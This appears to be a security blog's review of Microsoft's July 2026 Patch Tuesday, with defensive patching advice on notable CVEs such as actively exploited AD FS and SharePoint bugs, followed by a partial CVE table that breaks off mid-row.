                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4abf68b8-2f48-439d-8a92-bcc105d7b4f3/Picture1new.png" data-image-dimensions="2158x1150" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4abf68b8-2f48-439d-8a92-bcc105d7b4f3/Picture1new.png?format=1000w" width="2158" height="1150" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4abf68b8-2f48-439d-8a92-bcc105d7b4f3/Picture1new.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4abf68b8-2f48-439d-8a92-bcc105d7b4f3/Picture1new.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4abf68b8-2f48-439d-8a92-bcc105d7b4f3/Picture1new.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4abf68b8-2f48-439d-8a92-bcc105d7b4f3/Picture1new.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4abf68b8-2f48-439d-8a92-bcc105d7b4f3/Picture1new.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4abf68b8-2f48-439d-8a92-bcc105d7b4f3/Picture1new.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/4abf68b8-2f48-439d-8a92-bcc105d7b4f3/Picture1new.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
      
        </figure>
      

    
  


  





  <p class="">The products covered this month are also astonishing. There are patches for Windows and Windows components, Office and Office Components, Microsoft Edge (Chromium-based), Azure, .NET and Visual Studio, Github Copilot, Defender, Exchange Server, Hyper-V, Ages of Empire II, and Minecraft Server (really!). That phrase “Windows components” does some pretty heavy lifting here, too, as just about everything you’ve ever heard of is getting patched. All told, there are 63 rated Critical, six rated Moderate, one rated Low, with the rest rated Important in severity. Eight of these bugs were submitted through the ZDI program (more on that later). Two CVEs are listed as under active exploit while one other is listed as publicly known.</p><p class="">So how do we eat this elephant? One byte at a time (pun intended). Let’s start by looking a closer look at some of the more interesting updates for this month, starting with the bugs being exploited in the wild.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56155"><strong>CVE-2026-56155</strong></a><strong> - Active Directory Federation Services Elevation of Privilege Vulnerability<br></strong>This is one of several AD FS being patched this month, but it’s the only one being actively exploited. It stems from insufficient access-control granularity and does require local access and low privileges to start, but AD FS is exactly the kind of identity infrastructure attackers love to pivot through once they're in. It can also be paired with an RCE as we often see in ransomware. Test and deploy this patch quickly.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56154"><strong>CVE-2026-56164</strong></a><strong> - Microsoft SharePoint Server Elevation of Privilege Vulnerability<br></strong>The other bug being exploited in the wild this month is a modest CVSS 5.3 – but it shows why Moderate severity bugs still matter. It's a missing-authentication flaw, meaning an unauthenticated attacker can hit it over the network with no user interaction required. When something this reachable is being actively abused, patch it now and worry about the score later.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57092"><strong>CVE-2026-57092</strong></a><strong> - Microsoft Windows VMSwitch Elevation of Privilege Vulnerability<br></strong>This patch rates the highest CVSS score for the month: a solid 9.9. It’s a use-after-free that lets a low-privileged attacker escalate to full host compromise across a VM boundary. We saw something like this demonstrated at Pwn2Own Berlin on ESXi, but it clearly isn’t alone. If you’re using VMSwitch in your Hyper-V deployments (and you likely are), test and deploy this one quickly.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50522"><strong>CVE-2026-50522</strong></a><strong>/</strong><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58644"><strong>58644</strong></a><strong> - Microsoft SharePoint Remote Code Execution Vulnerability<br></strong>This matching pair of CVSS 9.8 bugs results from the deserialization-of-untrusted-data and are reachable without authentication or user interaction. CVE-2026-50522 was demonstrated during <a href="https://www.zerodayinitiative.com/blog/2026/5/16/pwn2own-berlin-2026-day-three-results-and-master-of-pwn">Pwn2Own Berlin</a>, so it’s odd to see Microsoft list it as “Exploit Maturity Unknown” since we literally handed them a working exploit. Just another reason to do your own risk assessment and not rely 100% on the vendor. If you have any Internet accessible SharePoint servers, test and deploy this patch quickly. </p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56190"><strong>CVE-2026-56190</strong></a><strong> - Remote Desktop Protocol Remote Code Execution Vulnerability</strong><br> This patch covers an unauthenticated, network-reachable, no user interaction required bug. The root cause is a classic one: use of uninitialized resource (CWE-908), meaning specially crafted RDP traffic can interact with memory that was never properly initialized, letting an attacker corrupt memory and potentially steer code execution. RDP Servers are a common target, so audit your systems to see which are internet accessible and start from there. </p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55008"><strong>CVE-2026-55008</strong></a><strong> - Microsoft Exchange Server Spoofing Vulnerability<br></strong>Ignore the title here and treat this like the XSS bug it is. The vulnerability is listed as a CVSS 9.6 since it’s a stored cross-site scripting flaw in Outlook Web Access, with a scope-changed impact that lets it break out of the web app context entirely. An attacker sends a specially crafted email, and if the victim simply opens it in OWA, arbitrary JavaScript executes in their browser session — no attachment needed, no macro warning, just viewing the message does it. If you’re using OWA, test and deploy this one quickly.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50518"><strong>CVE-2026-50518</strong></a><strong> - Windows DHCP Server Remote Code Execution Vulnerability<br></strong>There are a couple of these DHCP RCE patches in this release, but the other has caveats while this one does not. Both are heap-based buffer overflows scoring CVSS 9.8, both unauthenticated and network-reachable. If you're running DHCP Server role on anything Internet-adjacent (you're not, right?), these move to the top of the list.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56188"><strong>CVE-2026-56188</strong></a><strong> - Windows Server Network driver Remote Code Execution Vulnerability<br></strong>Another Critical-rated bug, this one is caused by a race condition. It’s always fun to see a TOCTOU bug rated this high, since race conditions are notoriously finicky to exploit reliably. While it may prove tricky to exploit, this bug could allow an attacker to execute privileged code over the network without user interaction. Don’t let the race condition lull you to sleep on a wormable bug.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55010"><strong>CVE-2026-55010</strong></a><strong> - Minecraft Bedrock Dedicated Server Remote Code Execution Vulnerability<br></strong>File this in the “why not” category. This bug is a heap-based buffer overflow in Minecraft Bedrock Dedicated Server, also CVSS 9.8 and also unauthenticated RCE. Yes, your kid’s Minecraft server (it is your kid’s server, right?) is exposed to the same class of bug as your DHCP infrastructure. Patch it anyway.</p><p class="">Here’s the full list of CVEs released by Microsoft for July 2026:</p>





















  
  




  


  
    





<link rel="File-List" href="2026-Jul-cvrf.fld/filelist.xml">













<table border="0" cellpadding="0" cellspacing="0" width="920">
 <col width="144">
 <col width="256">
 <col width="104" span="5">
 <tr height="47">
  <td width="144" class="xl65" height="47">CVE</td>
  <td width="256" class="xl65">Title</td>
  <td width="104" class="xl66">Severity</td>
  <td width="104" class="xl66">CVSS</td>
  <td width="104" class="xl66">Public</td>
  <td width="104" class="xl66">Exploited</td>
  <td width="104" class="xl66">Type</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56155"><span>CVE-2026-56155</span></a></td>
  <td width="256" class="xl74">Active Directory
  Federation Services Elevation of Privilege Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl70">Yes</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56164"><span>CVE-2026-56164</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Server Elevation of Privilege Vulnerability</td>
  <td class="xl71">Moderate</td>
  <td class="xl69">5.3</td>
  <td class="xl69">No</td>
  <td class="xl70">Yes</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50661"><span>CVE-2026-50661</span></a></td>
  <td width="256" class="xl74">Windows BitLocker
  Security Feature Bypass Vulnerability</td>
  <td class="xl68">Important</td>
  <td class="xl69">6.1</td>
  <td class="xl70">Yes</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54121"><span>CVE-2026-54121</span></a></td>
  <td width="256" class="xl74">Active Directory
  Certificate Services Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45499"><span>CVE-2026-45499 **</span></a></td>
  <td width="256" class="xl74">Azure OpenAI Elevation
  of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">9.9</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48564"><span>CVE-2026-48564</span></a></td>
  <td width="256" class="xl74">DHCP Server Service
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50370"><span>CVE-2026-50370</span></a></td>
  <td width="256" class="xl74">DHCP Server Service
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56159"><span>CVE-2026-56159</span></a></td>
  <td width="256" class="xl74">DHCP Server Service
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">9.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50382"><span>CVE-2026-50382</span></a></td>
  <td width="256" class="xl74">DirectX Graphics
  Kernel Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41106"><span>CVE-2026-41106 **</span></a></td>
  <td width="256" class="xl74">Microsoft 365 Copilot
  Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">9.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26145"><span>CVE-2026-26145 **</span></a></td>
  <td width="256" class="xl74">Microsoft Azure
  Synapse Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">4.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48561"><span>CVE-2026-48561</span></a></td>
  <td width="256" class="xl74">Microsoft Copilot
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">9.6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55011"><span>CVE-2026-55011</span></a></td>
  <td width="256" class="xl74">Microsoft Defender
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55012"><span>CVE-2026-55012</span></a></td>
  <td width="256" class="xl74">Microsoft Defender
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="96">
  <td class="xl67" height="96"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55944"><span>CVE-2026-55944</span></a></td>
  <td width="256" class="xl74">Microsoft Dynamics NAV
  and Microsoft Dynamics 365 Business Central (On Premises) Remote Code
  Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">9.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57100"><span>CVE-2026-57100 **</span></a></td>
  <td width="256" class="xl74">Microsoft Entra
  Provisioning Service Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">9.9</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55041"><span>CVE-2026-55041</span></a></td>
  <td width="256" class="xl74">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54998"><span>CVE-2026-54998 **</span></a></td>
  <td width="256" class="xl74">Microsoft Exchange
  Online Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55008"><span>CVE-2026-55008</span></a></td>
  <td width="256" class="xl74">Microsoft Exchange
  Server Spoofing Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">9.6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54992"><span>CVE-2026-54992</span></a></td>
  <td width="256" class="xl74">Microsoft Message
  Queuing Queue Manager Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50314"><span>CVE-2026-50314</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50467"><span>CVE-2026-50467</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55018"><span>CVE-2026-55018</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55022"><span>CVE-2026-55022</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55045"><span>CVE-2026-55045</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55049"><span>CVE-2026-55049</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55129"><span>CVE-2026-55129</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55056"><span>CVE-2026-55056</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55140"><span>CVE-2026-55140</span></a></td>
  <td width="256" class="xl74">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55043"><span>CVE-2026-55043</span></a></td>
  <td width="256" class="xl74">Microsoft PowerPoint
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55123"><span>CVE-2026-55123</span></a></td>
  <td width="256" class="xl74">Microsoft PowerPoint
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55120"><span>CVE-2026-55120</span></a></td>
  <td width="256" class="xl74">Microsoft PowerPoint
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50522"><span>CVE-2026-50522</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">9.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58644"><span>CVE-2026-58644</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">9.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55040"><span>CVE-2026-55040</span></a></td>
  <td width="256" class="xl74">Microsoft SharePoint
  Server Security Feature Bypass Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">9.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54117"><span>CVE-2026-54117</span></a></td>
  <td width="256" class="xl74">Microsoft SQL Server
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54118"><span>CVE-2026-54118</span></a></td>
  <td width="256" class="xl74">Microsoft SQL Server
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50655"><span>CVE-2026-50655</span></a></td>
  <td width="256" class="xl74">Microsoft Windows
  Media Foundation Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56189"><span>CVE-2026-56189</span></a></td>
  <td width="256" class="xl74">Microsoft Windows
  Media Foundation Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57090"><span>CVE-2026-57090</span></a></td>
  <td width="256" class="xl74">Microsoft Windows
  Media Foundation Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57094"><span>CVE-2026-57094</span></a></td>
  <td width="256" class="xl74">Microsoft Windows
  Media Foundation Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57087"><span>CVE-2026-57087</span></a></td>
  <td width="256" class="xl74">Microsoft Windows
  Media Foundation Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57092"><span>CVE-2026-57092</span></a></td>
  <td width="256" class="xl74">Microsoft Windows
  VMSwitch Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">9.9</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55033"><span>CVE-2026-55033</span></a></td>
  <td width="256" class="xl74">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55127"><span>CVE-2026-55127</span></a></td>
  <td width="256" class="xl74">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55132"><span>CVE-2026-55132</span></a></td>
  <td width="256" class="xl74">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55010"><span>CVE-2026-55010</span></a></td>
  <td width="256" class="xl74">Minecraft Bedrock
  Dedicated Server Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">9.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50474"><span>CVE-2026-50474</span></a></td>
  <td width="256" class="xl74">Remote Desktop Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49164"><span>CVE-2026-49164</span></a></td>
  <td width="256" class="xl74">Windows Active
  Directory Domain Services Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54128"><span>CVE-2026-54128</span></a></td>
  <td width="256" class="xl74">Windows DHCP Client
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">8.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50518"><span>CVE-2026-50518</span></a></td>
  <td width="256" class="xl74">Windows DHCP Server
  Remote Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">9.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49796"><span>CVE-2026-49796</span></a></td>
  <td width="256" class="xl74">Windows GDI+ Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50380"><span>CVE-2026-50380</span></a></td>
  <td width="256" class="xl74">Windows GDI+ Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">9.6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54127"><span>CVE-2026-54127</span></a></td>
  <td width="256" class="xl74">Windows Hyper-V
  Elevation of Privilege Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl69">7.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
